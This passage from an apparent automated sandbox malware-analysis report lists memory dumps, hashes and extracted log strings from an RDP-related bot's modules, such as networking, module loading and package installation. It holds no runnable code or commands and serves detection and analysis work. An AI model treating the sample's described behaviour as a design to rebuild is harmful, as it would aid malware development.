                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: AttributesErrorFileLast
                                                      • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                      • API String ID: 1799206407-4111913120
                                                      • Opcode ID: 5ed0d067b6df4f2e07e290aeffdb71b76f8ca25bfc64475e56e4b5cd1b69421c
                                                      • Instruction ID: c60dfa39a159541f45c4a51d6009be6759bd3ac35001429b0873e00aaa8c640b
                                                      • Opcode Fuzzy Hash: 5ed0d067b6df4f2e07e290aeffdb71b76f8ca25bfc64475e56e4b5cd1b69421c
                                                      • Instruction Fuzzy Hash: 8A21B65AF4F543C2FF668B5894E4B7922409F013FDFA04532D54E8A392DE1CE886A64B
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastrecv
                                                      • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                      • API String ID: 2514157807-65069805
                                                      • Opcode ID: 0a1b34fae7a4759d5745584ff93980657748c3b854fb101361829796ca049778
                                                      • Instruction ID: 50c8f78c09c9a500cd8073f580ba28f634d5a40bcdb9437ff9d4c74781fed99f
                                                      • Opcode Fuzzy Hash: 0a1b34fae7a4759d5745584ff93980657748c3b854fb101361829796ca049778
                                                      • Instruction Fuzzy Hash: 63118E28B0E50F82EA275F25A8687B412427F07FB0F810730DA2D477E3EE5DA5068349
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastrecv
                                                      • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                      • API String ID: 2514157807-65069805
                                                      • Opcode ID: 521feb20a72a957341fc0d264e623fa141536e4afba6e477ef33c19f24a5c93d
                                                      • Instruction ID: a3219e75c2f0d140f77c1dda8ebfe1df20678e8ed788155648b15d20e9eac923
                                                      • Opcode Fuzzy Hash: 521feb20a72a957341fc0d264e623fa141536e4afba6e477ef33c19f24a5c93d
                                                      • Instruction Fuzzy Hash: 3411515BB0E64B91EA62EF15AC7177412516F06FA0F450330ED2D8ABE3EE1CA556C308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastrecv
                                                      • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                      • API String ID: 2514157807-65069805
                                                      • Opcode ID: 1d774439edd380124319bd35bc897312daaeb92d8d859f87963e7a2f94a6acba
                                                      • Instruction ID: c3256406b72be44dd41405001f4458a52657d8822f7e335e647e1671be9213d1
                                                      • Opcode Fuzzy Hash: 1d774439edd380124319bd35bc897312daaeb92d8d859f87963e7a2f94a6acba
                                                      • Instruction Fuzzy Hash: 91119D65F1FA0781F9115358AC602781210AF01BF0F848334DC2D46BE3DF5CE6A6A78C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastrecv
                                                      • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                      • API String ID: 2514157807-65069805
                                                      • Opcode ID: 2ae2a37e5c8560215958916f0623df1cdd246532887d3322c8678fbb21397952
                                                      • Instruction ID: d514d1b62eac2c7f269201ee0579e96c170407bbee980470d772564ceed7dfcc
                                                      • Opcode Fuzzy Hash: 2ae2a37e5c8560215958916f0623df1cdd246532887d3322c8678fbb21397952
                                                      • Instruction Fuzzy Hash: 51116050F0F90F56E9205314A8707755250AF07FB6F414730FE2D86BE3EE9EA6468308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastrecv
                                                      • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                      • API String ID: 2514157807-65069805
                                                      • Opcode ID: 50f16c7df9a271bab7e1408e5b350b4adededf4a6de90b992999d4deae4ad3df
                                                      • Instruction ID: 1f5aae756c821ccf76ba3f1afed0513234d68e88259baf03a829c6e6f496087a
                                                      • Opcode Fuzzy Hash: 50f16c7df9a271bab7e1408e5b350b4adededf4a6de90b992999d4deae4ad3df
                                                      • Instruction Fuzzy Hash: C811C45EF0EA1781F652A315E9603751640AF90BF8F601330DC2DA63E7DE1CE9228309
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?,?,service,0000021B15D113D0,00007FF70CAD2910), ref: 00007FF70CAD2312
                                                      • GetLastError.KERNEL32(?,?,service,0000021B15D113D0,00007FF70CAD2910), ref: 00007FF70CAD233E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLibraryLoadfflushfwrite
                                                      • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
                                                      • API String ID: 4085810780-4145076245
                                                      • Opcode ID: bc55f70a68f1556e1ac72ef136052a39d6f875aa833af2b46a59c11ba6540690
                                                      • Instruction ID: 03f2490e52d3d46b8c8fa0440fc4902b05817480d86e5b4d4131cd011e1dd34f
                                                      • Opcode Fuzzy Hash: bc55f70a68f1556e1ac72ef136052a39d6f875aa833af2b46a59c11ba6540690
                                                      • Instruction Fuzzy Hash: 7FF0BEE0A0A60780ED25B75AFC40EF4A6106F44B8CFC80131CC0E16754EF9CA982D330
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Startupfflushfwrite
                                                      • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                      • API String ID: 3771387389-898331216
                                                      • Opcode ID: 62bc97c156583ed3092e0c20d54691acc908191e9a6b411faf57dda8f543264a
                                                      • Instruction ID: b4933eb3d1a17486517e2258d081ce9568be4b1aa033e7a4d7f295f1fa526114
                                                      • Opcode Fuzzy Hash: 62bc97c156583ed3092e0c20d54691acc908191e9a6b411faf57dda8f543264a
                                                      • Instruction Fuzzy Hash: 77F0F968B0A40F92FB129F14E8787F92210AF13B94F850436D50D4A3E3EE9DE5498788
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: Startupfflushfwrite
                                                      • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                      • API String ID: 3771387389-898331216
                                                      • Opcode ID: d189043dadf752719bc2fa3d3bc584d33221fa5f7df56ee74483cc14220b494d
                                                      • Instruction ID: ee7c9a56dfed95d65701da21eed02428b685356ef3a366309369b9f26ea0eaa2
                                                      • Opcode Fuzzy Hash: d189043dadf752719bc2fa3d3bc584d33221fa5f7df56ee74483cc14220b494d
                                                      • Instruction Fuzzy Hash: 05F049ABB0A64A91FB12DF10E8653F41261AF1AB84F890432D80D86397AE1CE5998308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: Startupfflushfwrite
                                                      • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                      • API String ID: 3771387389-898331216
                                                      • Opcode ID: 797258fad69575a73319076e18fe1457beafa678687e9360524f82ac39dcacd9
                                                      • Instruction ID: c26f692039c5e7e46ac3cdfad11364b9a4990a7cf85182e2015aa363a957e347
                                                      • Opcode Fuzzy Hash: 797258fad69575a73319076e18fe1457beafa678687e9360524f82ac39dcacd9
                                                      • Instruction Fuzzy Hash: F7F09062B0F80391FB12DB18EC653F41211AF107E8F880036D80D46793EF5CE699974C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Startupfflushfwrite
                                                      • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                      • API String ID: 3771387389-898331216
                                                      • Opcode ID: 01985655090be95bd34bcc5fbd411f4ff69008fd546008f15c08217f8511f44b
                                                      • Instruction ID: 5d65d7f3907e5a0a78a45ae16ed9300b4128a36cc28b383317aac6ab457a276b
                                                      • Opcode Fuzzy Hash: 01985655090be95bd34bcc5fbd411f4ff69008fd546008f15c08217f8511f44b
                                                      • Instruction Fuzzy Hash: 40F04F68B0F41FD1FB129F10E8243F412506F22B40F800436D80D4A397AE5DE5589708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: Startupfflushfwrite
                                                      • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                      • API String ID: 3771387389-898331216
                                                      • Opcode ID: 18599bda2ad098d9ecc36d45987f38cc39e5643c099abb5fd0b996352f0ed049
                                                      • Instruction ID: 7381a72130adbdd1736c611ea6e5491d8188a72fb267e40187707b3578ad785c
                                                      • Opcode Fuzzy Hash: 18599bda2ad098d9ecc36d45987f38cc39e5643c099abb5fd0b996352f0ed049
                                                      • Instruction Fuzzy Hash: A9F06260F0A50F82FF109714E4213FA13506F12B82F454432D90E467E7EE9EF649C308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: Startupfflushfwrite
                                                      • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                      • API String ID: 3771387389-898331216
                                                      • Opcode ID: 9a9980137d6a4ad6aac249e6250886b577c6bb601ad2ab04030cb3d182ef5364
                                                      • Instruction ID: 536b1c9c4aac0a34ef71253ca15616bb6b283a669353521f670a0eb2fbad4b10
                                                      • Opcode Fuzzy Hash: 9a9980137d6a4ad6aac249e6250886b577c6bb601ad2ab04030cb3d182ef5364
                                                      • Instruction Fuzzy Hash: DDF090A7F1A847C1FB539711E8283F61690AFA57E8F440032C84D463A7EE1CE649CB49
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$HandleModule_mbscpy
                                                      • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
                                                      • API String ID: 3656010895-1379287937
                                                      • Opcode ID: 999f462e853b377e48d0abd04af6c90689e3eae28469ba59c3687f2a7c353423
                                                      • Instruction ID: d13614046ca46816d36cf168c1df4afa3b76afe702df8032afd96c0d3e7e2f36
                                                      • Opcode Fuzzy Hash: 999f462e853b377e48d0abd04af6c90689e3eae28469ba59c3687f2a7c353423
                                                      • Instruction Fuzzy Hash: E53150A2A18A8791EB10AB54FC907E9A361EF84354FC01532E74F4768DDF6DD909C790
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastProcfflushfwrite
                                                      • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                      • API String ID: 1224403792-3063791425
                                                      • Opcode ID: da492238ef1817226800074fda20234807e6668643ef1cd1465af84d33c768e5
                                                      • Instruction ID: ebf96167163855222a2d333698530f2efe8eb7c71668955984f7e54a22dbeff2
                                                      • Opcode Fuzzy Hash: da492238ef1817226800074fda20234807e6668643ef1cd1465af84d33c768e5
                                                      • Instruction Fuzzy Hash: 0AF08F98B0A74F52FA134F05A8387A552516F06FE4F844531DD4C07B96EE2D96468308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastProcfflushfwrite
                                                      • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                      • API String ID: 1224403792-3063791425
                                                      • Opcode ID: b129290725b7a4eed0bc88a27846854925b358a8e0c638c3c609fff8d412ed50
                                                      • Instruction ID: 35818ad1640035697ecfc5d30a2ab8c6021a21d44b4be327280e047dbb852e85
                                                      • Opcode Fuzzy Hash: b129290725b7a4eed0bc88a27846854925b358a8e0c638c3c609fff8d412ed50
                                                      • Instruction Fuzzy Hash: 91F0A29BB0B64B82FA03EF45B8203B913126F0AFC0F084131DD4C47796EE2CE5568308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastProcfflushfwrite
                                                      • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                      • API String ID: 1224403792-3063791425
                                                      • Opcode ID: 884f5832a0a4ec45437eaf3a3320f14c4d5bce9836479d65f6e3fb68efeab03e
                                                      • Instruction ID: 7dd5d024bcd86ab11a4fe36699a657fd4d035803959d3df9e16f20c5892f2d3a
                                                      • Opcode Fuzzy Hash: 884f5832a0a4ec45437eaf3a3320f14c4d5bce9836479d65f6e3fb68efeab03e
                                                      • Instruction Fuzzy Hash: A0F0D195B0F60391FE065B0AB8601A552126F04FF4F488035DC4C0B797EF2CE696834C
                                                      APIs
                                                      • GetProcAddress.KERNEL32(?,?,00000000,0000021B15D113D0,?,00007FF70CAD292B), ref: 00007FF70CAD22A3
                                                      • GetLastError.KERNEL32(?,?,00000000,0000021B15D113D0,?,00007FF70CAD292B), ref: 00007FF70CAD22D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
